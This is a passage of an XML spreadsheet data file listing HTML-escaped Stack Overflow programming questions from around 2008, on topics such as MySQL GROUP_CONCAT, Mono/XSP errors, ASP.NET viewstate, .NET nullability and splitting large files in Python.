&lt;pre&gt;&lt;code&gt;- (void)application:(UIApplication *)application willChangeStatusBarFrame:(CGRect)newStatusBarFrame
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This one is called only when the toolbar is changing orientation.&lt;/p&gt;
&lt;p&gt;&lt;img src="http://is.hn/downloads/IMG_0008.PNG" alt="alt text" /&gt;
&lt;img src="http://is.hn/downloads/IMG_0009.PNG" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Array slicing / group_concat limiting in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let's say I have a table:&lt;/p&gt;
&lt;pre&gt;
i j
---
a 1
a 2
a 3
a 4
b 5
b 6
b 7
b 8
b 9
&lt;/pre&gt;
&lt;p&gt;Obvoiusly &lt;code&gt;SELECT a, GROUP_CONCAT(b SEPARATOR ',') GROUP BY a&lt;/code&gt; would give me&lt;/p&gt;
&lt;pre&gt;
a  1,2,3,4
b  5,6,7,8,9
&lt;/pre&gt;
&lt;p&gt;But what if I want to get only a LIMITED number of results, like 2, for example:&lt;/p&gt;
&lt;pre&gt;
a  1,2
b  5,6
&lt;/pre&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sample web Page using Mono and XSP on windows box</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm attempting to get my first ASP.NET web page working on windows using &lt;a href="http://www.mono-project.com/Main_Page" rel="nofollow"&gt;Mono&lt;/a&gt; and the XSP web server.&lt;/p&gt;
&lt;p&gt;I'm following this chaps &lt;a href="http://www.codeproject.com/KB/cross-platform/introtomono2.aspx" rel="nofollow"&gt;example&lt;/a&gt;. The &lt;a href="http://www.codeproject.com/KB/cross-platform/introtomono1.aspx" rel="nofollow"&gt;first part&lt;/a&gt; of his example works very well with the latest version of mono. however the web part seems to fall over with the following error&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;'{Path Name}\Index.aspx.cs' is not a
  valid virtual path.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here's the full Stack Trace:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.Web.HttpException: 'C:\Projects\Mono\ASPExample\simpleapp\index.aspx.cs' is not a valid virtual path.  
   at System.Web.HttpRequest.MapPath (System.String virtualPath, System.String baseVirtualDir, Boolean allowCrossAppMapping) [0x00000]   
   at System.Web.HttpRequest.MapPath (System.String virtualPath) [0x00000]   
   at System.Web.Compilation.BuildManager.AddToCache (System.String virtualPath, System.Web.Compilation.BuildProvider bp) [0x00000]   
   at System.Web.Compilation.BuildManager.BuildAssembly (System.Web.VirtualPath virtualPath) [0x00000]   
   at System.Web.Compilation.BuildManager.GetCompiledType (System.String virtualPath) [0x00000]   
   at System.Web.Compilation.BuildManager.CreateInstanceFromVirtualPath (System.String virtualPath, System.Type requiredBaseType) [0x00000]   
   at System.Web.UI.PageParser.GetCompiledPageInstance (System.String virtualPath, System.String inputFile, System.Web.HttpContext context) [0x00000]
   at System.Web.UI.PageHandlerFactory.GetHandler (System.Web.HttpContext context, System.String requestType, System.String url, System.String path) [0x00000]
   at System.Web.HttpApplication.GetHandler (System.Web.HttpContext context, System.String url, Boolean ignoreContextHandler) [0x00000]
   at System.Web.HttpApplication.GetHandler (System.Web.HttpContext context, System.String url) [0x00000]
   at System.Web.HttpApplication+&amp;lt;Pipeline&amp;gt;c__Iterator5.MoveNext () [0x00000]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I was wondering if anyone knew what this error meant. I guess i'm looking for a mono expert, who's tried out the windows version.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Inconsistencies with viewstate/function/server vs development server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The code goes something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected bool IsOKToSend()
{
    bool IsOK = true;        
    lblErrorSending.Visible = false;
    if (txtUserName.Text == "" )
    { 
	lblErrorSending.Text = "Please enter your username before sending.";
	IsOK = false;
    }
    return IsOK;
}
    protected void btnSubmit_Click(object sender, EventArgs e)
{
    if (IsOKToSend())
    {
        adsUser.Insert();
        Response.Redirect("complete.aspx");
    }
    else
    {
        lblErrorSending.Visible = true;
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For some reason it doesn't work consistently on the live server.
Keep in mind that it ALWAYS works on my local development machine and SOMETIMES
(about 1 in 3 tries) works on the live machine. When it fails on the live server
the page reloads and all viewstate are lost.&lt;/p&gt;
&lt;p&gt;I have a default error catch in my webconfig file and the page is never redirected to the
error page.&lt;/p&gt;
&lt;p&gt;Consistent bug are easy to troubleshoot but something like this isn't.&lt;/p&gt;
&lt;p&gt;Any idea on what could make this page sometime works and sometime not and/or why
the viewstate aren't kept when it fails to work? 
Why am I not getting the same problem on my local machine?&lt;/p&gt;
&lt;p&gt;I tried merging the two function to see if calling the external function was causing
the issue but it didn't change anything unfortunately. Also, the value of IsOK does not seem to influence whether I'll get the bug or not.&lt;/p&gt;
&lt;p&gt;I removed all the code in the page load function to make sure to troubleshoot
correctly but I'm still getting the same issue.&lt;/p&gt;
&lt;p&gt;Any idea will be appreciated.&lt;/p&gt;
&lt;p&gt;Edit: I was gonna send this as is but I decided to try the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void btnSubmit_Click(object sender, EventArgs e)
{
    bool IsOK = true;        
    lblErrorSending.Visible = false;
    if (txtUserName.Text == "" )
    { 
        lblErrorSending.Text = "Please enter your username before sending.";
        IsOK = false;
    }
    lblErrorSending.Visible = !IsOK;        
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I click a few times on the button the page does lose the viewstate value
after a few tries but not always.
So the main issue here appears to be a problem with the viewstate not 
working correctly all the time. Any idea?&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Determine whether browser allows focus on radios/checkboxes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know if it's possible to determine, using JavaScript, whether the user's browser allows checkboxes and radio buttons to be focused? In other words, whether you can tab to select them.&lt;/p&gt;
&lt;p&gt;I can't just use browser detection to do this, because in at least one case (Safari), the user can turn the ability on and off.&lt;/p&gt;
&lt;p&gt;Also in Safari, the focus() function is defined even when this ability is turned off, and it doesn't throw an error. So checking that function won't work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Migrating from one DBMS to another</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone have any experience migrating from one DBMS to another?  If you have done this, why did you do it? Features? Cost? Corporate Directive?&lt;/p&gt;
&lt;p&gt;At times, I've worked with DBAs who insisted that we not use features specific to a DBMS (for example, CLR Stored Procedures in SQL Server.)  The DBAs point is, if we use these features, it will make it more difficult to switch to another DBMS if we have to.  But so far, I've never been asked to switch.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows Forms Error: "A strongly-named assembly is required"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Windows forms project (VS 2005, .net 2.0). The solution has references to 9 projects. Everything works and compiles fine on one of my computers. When I move it to a second computer, 8 out of the 9 project compile with no problem. When I try to compile the 9th project (the main project for the application - produces the .exe file to execute the application), I get the following error: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;'Error 3: A strongly-named assembly is required. (Exception from HRESULT: 0x80131044)'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The file location for the error is is listed as "C:\PATH-TO-APP\LC". &lt;/p&gt;
&lt;p&gt;I have checked in the project properties and all of the projects are set to build in Debug mode, none of them are supposed to be signed. In the project that is failing, the only assembly that it references that is not in any of the other projects is Microsoft.VisualBasic (a .net 2.0 assembly). So I am at a loss to find what ids causing this error (the file referenced above in the error message - "LC" - does not exist. &lt;/p&gt;
&lt;p&gt;Anyone know how I can force the project to accept all unsigned assemblies, or to determine which assembly is the culprit?&lt;/p&gt;
&lt;p&gt;The only meaningful difference between the dev environments between the dev environment where this worked and the current one is that the first was XP and this is Vista64. However, a colleague of mine who is using XP is getting the same error.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Third-party assemblies being used:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;ComponentFactory.Krypton.Toolkit&lt;/li&gt;
&lt;li&gt;ComponentFactory.Krypton.Navigator&lt;/li&gt;
&lt;li&gt;VistaDB.NET20&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All of these are referenced in other projects in the solution which build with no problems, so it doesn't look like these are the problem.&lt;/p&gt;
&lt;p&gt;So far I have tried deleting the suo file, Rebuild All, unloading and reloading projects from the solution, removing and readding referenced assemblies. Nothing has worked.&lt;code&gt; &lt;/code&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tree library for PHP using left &amp; right ids</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a library in PHP that can create a tree structure from a database (or array of values) with left and right ids. For the result when getting values I am only looking for an array so I can create any type of view. For adding and removing, it would be nice if the library did it all. Even if the library is within another library, I don't mind as I'll probably pull it out and integrate it with my own libraries.&lt;/p&gt;
&lt;p&gt;Anyone know of anything?&lt;/p&gt;
&lt;p&gt;I'm using PHP &amp;amp; MySQL, so it'd be helpful if it used atleast PHP. If it's a different database I can probably convert it, although maybe the same with PHP if it doesn't use too much language specific functionality.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>invalid QName when transforming a .net XSLTransform</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a piece of XML that is structured similar to this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; &amp;lt;root&amp;gt;
      &amp;lt;score name="Exam 1"&amp;gt;&amp;lt;value&amp;gt;76&amp;lt;/value&amp;gt;&amp;lt;/score&amp;gt;
      &amp;lt;score name="Exam 2"&amp;gt;&amp;lt;value&amp;gt;87&amp;lt;/value&amp;lt;/score&amp;gt;
 &amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and I would like to transform it to look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;root&amp;gt;
     &amp;lt;Exam 1&amp;gt;76&amp;lt;/Exam 1&amp;gt;
     &amp;lt;Exam 2&amp;gt;87&amp;lt;/Exam 2&amp;gt;
&amp;lt;/root&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Following &lt;a href="http://www.peachpit.com/articles/article.aspx?p=21846" rel="nofollow"&gt;this article&lt;/a&gt; I am using this stylesheet:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    &amp;lt;stylesheet&amp;gt;
        &amp;lt;xsl:stylesheet version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform'&amp;gt;
            &amp;lt;xsl:template match='@*|node()'&amp;gt;
                &amp;lt;xsl:copy&amp;gt;
                    &amp;lt;xsl:apply-templates select='@*|node()'/&amp;gt;
                &amp;lt;/xsl:copy&amp;gt;
            &amp;lt;/xsl:template&amp;gt;
            &amp;lt;xsl:template match='score'&amp;gt;
                &amp;lt;xsl:element name='{@name}'&amp;gt;
                    &amp;lt;xsl:apply-templates/&amp;gt;
                &amp;lt;/xsl:element&amp;gt;
            &amp;lt;/xsl:template&amp;gt;
        &amp;lt;/xsl:stylesheet&amp;gt;
    &amp;lt;/stylesheet&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, when I transform it and load it into a document, I receive this error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;System.Xml.Xslt.XsltException: 'Exam 1' is an invalid QName&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;It seems that many of the google results show people with this error have passed an empty string somehow, the error is "" is an invalid QName, but that's not the case here.&lt;/p&gt;
&lt;p&gt;What is the problem?  Is there a better, alternative solution?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does .NET 3.5 installer include 3.0 SP2?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're trying to track down some .Net assembly dependency problems.&lt;/p&gt;
&lt;p&gt;On Windows XP, does the .Net 3.5 installer include 3.0 SP2 automatically?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rails &amp; Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is Rails development really this hard on Windows? I'm a PHP developer looking forwards to using Rails (mainly because every single PHP framework I've tried has some quirk that I just hate).&lt;/p&gt;
&lt;p&gt;I downloaded Aptana Studio (w/ RadRails) as it seemed to be a good solution (and because I love anything Eclipse-based). But that's where the problems begin - upon creating a project (called "test", using sqlite3), the first problem I hit is some "sqlite3 is missing" error. So I Google around a bit and install sqlite3-ruby with gem. I still got some error - but somehow managed to fix it. So it seems to work, but is this really it? Some environment that barely seems to work and has a lot of problems (&lt;a href="http://stackoverflow.com/questions/164896/limitations-in-running-rubyrails-on-windows"&gt;see this&lt;/a&gt;)?&lt;/p&gt;
&lt;p&gt;In some other question, I saw the suggestion to run the project in a VM instead and edit it from Windows. Sounds like a good idea - but the two major Rails IDE's (RadRails, NetBeans, unless there's more) seem to want to run their own server in Windows. What would be the best setup for them/how would I set up a project in them if I'd run a Linux Rails stack in a VM instead?&lt;/p&gt;
&lt;p&gt;Note that I'd rather not work without an IDE - upon trying one for PHP, I instantly became completely dependent (sigh) on them - and since I've never really used Ruby (or Rails) before, having code completion would be a major help.&lt;/p&gt;
&lt;p&gt;So what are your suggestions? Run in Windows or Windows &amp;amp; Linux stack in VM? Any other tips?&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Modifying WordPress's "post-new.php" File for Custom Blog Entries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Has anyone ever modified the "post-new.php" file in their WordPress installation?  &lt;/p&gt;
&lt;p&gt;I want to modify the look of this page to include pieces that I standardly include in my blog posts, and I just don't know if it is do-able/easy/worth my time.&lt;/p&gt;
&lt;p&gt;Should I just find another CMS that allows more modifcation like Drupal?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mark parameters as NOT nullable in C#/.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a simple attribute or data contract that I can assign to a function parameter that prevents &lt;code&gt;null&lt;/code&gt; from being passed in C#/.NET?  Ideally this would also check at compile time to make sure the literal &lt;code&gt;null&lt;/code&gt; isn't being used anywhere for it and at run-time throw &lt;code&gt;ArgumentNullException&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Currently I write something like ...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (null == arg)
  throw new ArgumentNullException("arg");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;... for every argument that I expect to not be &lt;code&gt;null&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;On the same note, is there an opposite to &lt;code&gt;Nullable&amp;lt;&amp;gt;&lt;/code&gt; whereby the following would fail:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NonNullable&amp;lt;string&amp;gt; s = null; // throw some kind of exception
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>What is needed to execute visual studio 2005 web tests?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Our test department has a series of web tests created using Visual Studio 2005 Team Tester Edition.&lt;/p&gt;
&lt;p&gt;I would like to be able to execute these tests against my local machine. I attempted to use the mstest command line tool to accomplish this as described in &lt;a href="http://msdn.microsoft.com/en-us/library/ms182487(VS.80).aspx" rel="nofollow"&gt;this MSDN article&lt;/a&gt;. But I get the following error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;C:\WebTests\Participant&gt;mstest
  /testcontainer:AE_ActivityDue_Touch.webtest
  Microsoft (R) Test Execution Command
  Line Tool Version 9.0.30729.1
  Copyright (c) Microsoft Corporation.
  All rights reserved.&lt;/p&gt;
  &lt;p&gt;Loading
  AE_ActivityDue_Touch.webtest...
  AE_ActivityDue_Touch.webtest File
  extension specified '.webtest' is not
  a valid test extension.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Any hints on how I can get this to work? Eventually we want to work them into our CI process.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>another sound as with subtitles</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;is it possible to get other sounds to a divx as it is with getting subtitles?
what is that format of that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to assign Date parameters to Hibernate query for current timezone?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When you assign a date to a named SQL parameter Hibernate automatically converts it to GMT time. How do you make it use the current server timezone for all dates?&lt;/p&gt;
&lt;p&gt;Lets say you have a query:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Query q = session.createQuery("from Table where date_field &amp;lt; :now");
q.setDate("now", new java.util.Date());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;"now" will be set to GMT time, while "new Date()" gets your current server time.&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I split a huge text file in python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a huge text file (~1GB) and sadly the text editor I use won't read such a large file.  However, if I can just split it into two or three parts I'll be fine, so, as an exercise I wanted to write a program in python to do it.  &lt;/p&gt;
&lt;p&gt;What I think I want the program to do is to find the size of a file, divide that number into parts, and for each part, read up to that point in chunks, writing to a &lt;em&gt;filename&lt;/em&gt;.nnn output file, then read up-to the next line-break and write that, then close the output file, etc.  Obviously the last output file just copies to the end of the input file.&lt;/p&gt;
&lt;p&gt;Can you help me with the key filesystem related parts: filesize, reading and writing in chunks and reading to a line-break?&lt;/p&gt;
&lt;p&gt;I'll be writing this code test-first, so there's no need to give me a complete answer, unless its a one-liner ;-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MVC and jQuery validation, where to 'weave' the javascript and how to embed into master page?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If my header/footer are in the master page, and my .js files are referenced in the master page, how can I add jQuery validation on my login page?&lt;/p&gt;
&lt;p&gt;If there is an error detected, how will I modify the .js file to display the appropriate error message?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>New to functional programming</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Hey, I'm really new to Haskell and have been using more classic programming languages my whole life.  I have no idea what is going on here.  I'm trying to make a very simple Viterbi algorithm implementation, but for only two states (honest and dishonest casino)&lt;/p&gt;
&lt;p&gt;I have a problem where I want to address my array, but I don't think I'm getting types right.  That or I'm making a new array each time I try to address it - equally stupid.  Look at myArray, te infix, and dynamicProgram especially, PLEASE.  Pretty pretty please &lt;/p&gt;
&lt;pre&gt; Code
&lt;code&gt;
import Array
import Char
trans :: Int -&gt; Int -&gt; Double -&gt; Double -&gt; Double
trans from x trans11 trans21 =
    if (from == 1) &amp;&amp; (x == 1)
        then trans11
    else if (from == 1) &amp;&amp; (x == 2) 
        then (1-trans11)
    else if (from == 2) &amp;&amp; (x == 1) 
        then trans21
    else (1-trans21)
em :: Char -&gt; [Double] -&gt; Double
em c list = list!! a
    where a = digitToInt c
intToChar :: Int -&gt; Char
intToChar n | n == 1 = '1'
            | n == 2 = '2'
casino :: Char -&gt; Int -&gt; Int -&gt; [Double] -&gt; [Double] -&gt; Double -&gt; Double -&gt; Double
casino seqchar 1 y em1 em2 t1 t2= 0.5 * (em seqchar em1)
casino seqchar 2 y em1 em2 t1 t2= 0.5 * (em seqchar em2)
casino seqchar x y em1 em2 t1 t2= maximum[ (1 @@ y-1)*(em seqchar em1)*(trans 1 x t1 t2),(2 @@ y-1)*(em seqchar em2)*(trans 2 x t1 t2) ]
dynamicProgram :: [Char] -&gt; (Char -&gt; Int -&gt; Int -&gt; [Double] -&gt; [Double] -&gt; Double -&gt; Double -&gt; Double) -&gt; [Double] -&gt; [Double] -&gt; Double -&gt; Double -&gt; (Array a b)
dynamicProgram string score list1 list2 trans11 trans21 = myArray 1 len
    						    [score (string!!y) x y list1 list2 trans11 trans21 | x  Int -&gt; [Double] -&gt; Array a b
myArray startIndex endIndex values = listArray (startIndex,startIndex) (endIndex,endIndex) values
traceback :: [Char] -&gt; Int -&gt; Int -&gt; [Double] -&gt; [Double] -&gt; Double -&gt; Double -&gt; [Char]
traceback s 1 0 em1 em2 t1 t2 = []
traceback s 2 0 em1 em2 t1 t2 = []
traceback s x y em1 em2 t1 t2 | x@@y == (1 @@ y-1)*(em (s!!y) em1)*(trans 1 x t1 t2) = '1' : traceback s 1 (y-1) em1 em2 t1 t2
                            | x@@y == (2 @@ y-1)*(em (s!!y) em1)*(trans 2 x t1 t2) = '2' : traceback s 2 (y-1) em1 em2 t1 t2 
answer :: [Char] -&gt; [Double] -&gt; [Double] -&gt; Double -&gt; Double -&gt; [Char]
answer string list1 list2 t1 t2 = reverse $ maxC : traceback string max end list1 list2 t1 t2 $ dynamicProgram casino string list1 list2 t1 t2
   where
      end = (length string) + 1
      max | maximum (1@@end) (2@@end) == 1@@end = 1
      | maximum (1@@end) (2@@end) == 2@@end = 2
      maxC = intToChar max
infix 5 @@
(@@) i j = myArray ! (i, j)
main = do
    putStrLn "What is the sequence to test?"
    seq  state 1 transmission probability?"
    trp1  state 2 transmission probability is " ++ (1-trp1)
    putStrLn "What is the state 2 -&gt; state 1 transmission probability?"
    trp2  state 2 transmission probability is " ++ (1-trp2)
    putStrLn "I assume that the prob of starting in either state is 1/2.  Go!"
    answer seq st1 st2 trp1 trp2
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Groovy in Ant build.xml (with Java classes)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to include Groovy classes into existing Java apps, and include Groovy into Ant's &lt;code&gt;build.xml&lt;/code&gt; file.&lt;/p&gt;
&lt;p&gt;What is the best way to configure Ant's &lt;code&gt;build.xml&lt;/code&gt; for it? &lt;/p&gt;
&lt;p&gt;Update: Are there more specifics in combining Java and Groovy compilations? Sequence of tasks?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Do you just code, or just design, or some of both?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Since I hold the job of both coder and designer I wonder if a lot of others are in the same boat. What percentage of your time is each?&lt;/p&gt;
&lt;p&gt;For me it's as close to 50/50 as you can get and I think I do a pretty good job at each: &lt;a href="http://rpmware.com" rel="nofollow"&gt;RPMWare&lt;/a&gt;. That said, I know I'm neither the best coder or designer out there, but I can hold my own in each respect.&lt;/p&gt;
&lt;p&gt;Is the best team one with full-time designer and full-time coders, or a hodge-podge of guys (and gals) who wear both hats.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>File Access from Excel COM object fails when run from NT Service on Vista</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We use COM objects to access excel spreadsheets in an NT service (via the Windows Scripting Host).  Prior to Vista, this worked beautifully, but starting with Vista, we receive this error:&lt;/p&gt;
&lt;p&gt;Microsoft Office Excel cannot access the file 'c:\myfiles\test.xls'. There are several possible reasons:
â€¢ The file name or path does not exist.
â€¢ The file is being used by another program.
â€¢ The workbook you are trying to save has the same name as a currently open workbook.&lt;/p&gt;
&lt;p&gt;I have tried changing the NT service logon settings to use my own account, an admin account and local system.  I've looked through the Local Security Policy and have not found anything.  I've spent days searching through the Microsoft KB to no avail.&lt;/p&gt;
&lt;p&gt;If the script is executed from a console application, it works fine.  The file opens and is processed with no problem.  The error only occurs when executed from within the context of a service.&lt;/p&gt;
&lt;p&gt;If the service is running on Windows XP or Server 2003 SP1, it also works fine.  Only on Vista does it fail (and we've now gotten reports of it failing in Server 2003 SP2)!&lt;/p&gt;
&lt;p&gt;The code, for what it is worth is exceptionally simple:
dim xl_app
Set xl_app = CreateObject("Excel.Application")
xl_app.Workbooks.Open mypath,0,1&lt;/p&gt;
&lt;p&gt;I suspect that this person might be experiencing the same issue:
&lt;a href="http://bytes.com/forum/thread819740.html" rel="nofollow"&gt;http://bytes.com/forum/thread819740.html&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET shared hosting provider that allows multiple websites (not just applications)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Most ASP.NET hosts give you a single website in IIS.  Then, they let you set subfolders as applications.  Are there any shared ASP.NET 3.5 hosts that give you multiple websites with a single account?&lt;/p&gt;
&lt;p&gt;I have several low traffic websites that don't use much bandwidth.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How wrong is it to have a unique and normal index on the same column?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have the following table structure&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE `table` (
  `id` int(11) NOT NULL auto_increment,
  `date_expired` datetime NOT NULL,
  `user_id` int(11) NOT NULL,
  `foreign_id` int(11) NOT NULL,
  PRIMARY KEY  (`id`),
  UNIQUE KEY `date_expired` (`date_expired`,`user_id`,`foreign_id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you'll notice, I have duplicate indexes on user_id: &lt;code&gt;date_expired&lt;/code&gt; &amp;amp; &lt;code&gt;user_id&lt;/code&gt;. I of course want the unique index because I want to ensure the data is unique.&lt;/p&gt;
&lt;p&gt;The reason for the duplicate indexes is because without the &lt;code&gt;user_id&lt;/code&gt; index, my main search query takes 4 seconds. With the extra index it takes 1 second. The query is joining the table on &lt;code&gt;user_id&lt;/code&gt; and checking &lt;code&gt;date_expired&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The table only has 275 records.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;How bad is it to have a unique and normal index on the same field?&lt;/li&gt;
&lt;li&gt;How bad is it to have larger indexes than data when the table is purely ids?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Opening a VS 2003 C++ project in VS 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Found some old code, circa VS 2003. Now I have just VS 2008 (SP1) installed. When I try opening the *.sln file, it tries converting the projects. The report notifies me it was done successfully, but the solution is empty, marked with "project file was unloaded".
VS 2008 doesn't even include opening a *.vcproj file.&lt;/p&gt;
&lt;p&gt;Does anyone have any idea how I can convert my solution?&lt;/p&gt;
&lt;p&gt;PS: I found several conversion tools that convert from VS 2005 to 2008 and vice versa - no one looks back to 2003 :(&lt;/p&gt;
&lt;p&gt;As always, thanks for your assistance and time!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to discard everything after a certain string character in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to take a string in PHP and discard everything after a certain character. However, it needs to search for not just one character, but an array of them. As soon as it gets to one of the characters in the array, it should return the string before that point.&lt;/p&gt;
&lt;p&gt;For instance, if I have an array:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$chars = array("a", "b", "c");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How would I go through the following string...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;log dog hat bat
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...and end up with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;log dog h
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any solutions would be very much appreciated. :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wrapping Visual C++ in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to do some process injection using C++ but I would prefer to use C# for everything other than the low level stuff. I have heard about "function wrapping" and "marshaling" and have done quite a bit of google searching and have found bits of information here and there but I am still really lacking. &lt;/p&gt;
&lt;p&gt;Things I have read in order of usefulness;&lt;br /&gt;
&lt;a href="http://msdn.microsoft.com/en-us/library/ms235281" rel="nofollow"&gt;http://msdn.microsoft.com/en-us/library/ms235281&lt;/a&gt;(VS.80).aspx&lt;br /&gt;
&lt;a href="http://www.drdobbs.com/cpp/184401742" rel="nofollow"&gt;http://www.drdobbs.com/cpp/184401742&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://geeklit.blogspot.com/2006/08/calling-c-lib-from-c.html" rel="nofollow"&gt;http://geeklit.blogspot.com/2006/08/calling-c-lib-from-c.html&lt;/a&gt;  &lt;/p&gt;
&lt;p&gt;How can I wrap all the lower level stuff (native C++) in C# so I can easily command those functions in a language I am more comfortable with, C#? &lt;/p&gt;
&lt;p&gt;Any information on the topic is much appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MS Source Server: significance of srcsrv.ini variable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The MS source server technology uses an initialization file named srcsrv.ini. One of the values identifies the source server location(s), e.g.,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MYSERVER=\\machine\foobar
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The docs leave much unanswered about this value. To start with, I haven't been able to find the significance of the value name, i.e., what's on the left side--and I don't see it used anywhere else. Hewardt &amp;amp; Pravat in &lt;a href="http://www.advancedwindowsdebugging.com/" rel="nofollow"&gt;Advanced Windows Debugging&lt;/a&gt; say "The left side ... represents the project name", but that doesn't seem to jibe with MS's "MYSERVER" example.&lt;/p&gt;
&lt;p&gt;What &lt;i&gt;is&lt;/i&gt; the significance of the left side? Where else is it used? Does the value reference a server or a project, and is there one per server, or one per project?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Microsoft MIDL does not report an error if a typedef uses an unknown type, is it a bug?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to know whether I am missing something:&lt;/p&gt;
